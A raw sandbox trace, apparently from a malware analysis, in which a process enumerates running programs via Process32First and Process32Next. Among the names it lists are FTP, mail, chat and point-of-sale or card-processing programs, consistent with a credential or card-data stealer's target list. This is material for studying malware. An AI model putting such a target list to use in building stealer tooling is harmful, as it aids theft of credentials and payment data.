th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0175.021] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0175.023] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0175.024] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0175.026] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0175.028] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0175.030] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0175.031] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0175.033] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0175.035] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0175.037] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0175.039] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0175.041] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0175.085] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0175.087] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0175.089] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0175.092] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0175.094] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0175.097] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0175.099] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0175.102] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0175.105] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0175.108] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0175.110] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0175.113] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0175.116] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0175.146] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0175.149] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0175.151] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0175.154] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0175.157] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0175.159] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0175.162] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0175.165] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0175.167] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0175.170] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0175.172] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0175.175] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0175.178] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0175.191] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0175.220] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0175.223] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0175.226] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0175.228] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0175.230] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0175.233] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0175.236] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0175.238] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0175.240] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0175.242] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0175.244] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0175.246] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0175.248] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0175.250] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0175.252] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0175.254] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0175.261] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0175.263] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0175.265] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0175.266] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0175.268] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0175.270] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0175.272] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0175.274] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0175.277] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0175.279] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0175.281] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0175.283] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.285] Process32Next (in: hSnapshot=0x19b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0175.287] CloseHandle (hObject=0x19b8) returned 1 [0175.287] Sleep (dwMilliseconds=0x64) [0175.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0175.431] Process32First (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.433] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0175.435] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0175.438] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.440] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0175.443] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.446] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0175.506] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0175.508] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0175.511] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.513] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.515] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0175.517] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.519] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.524] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.527] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 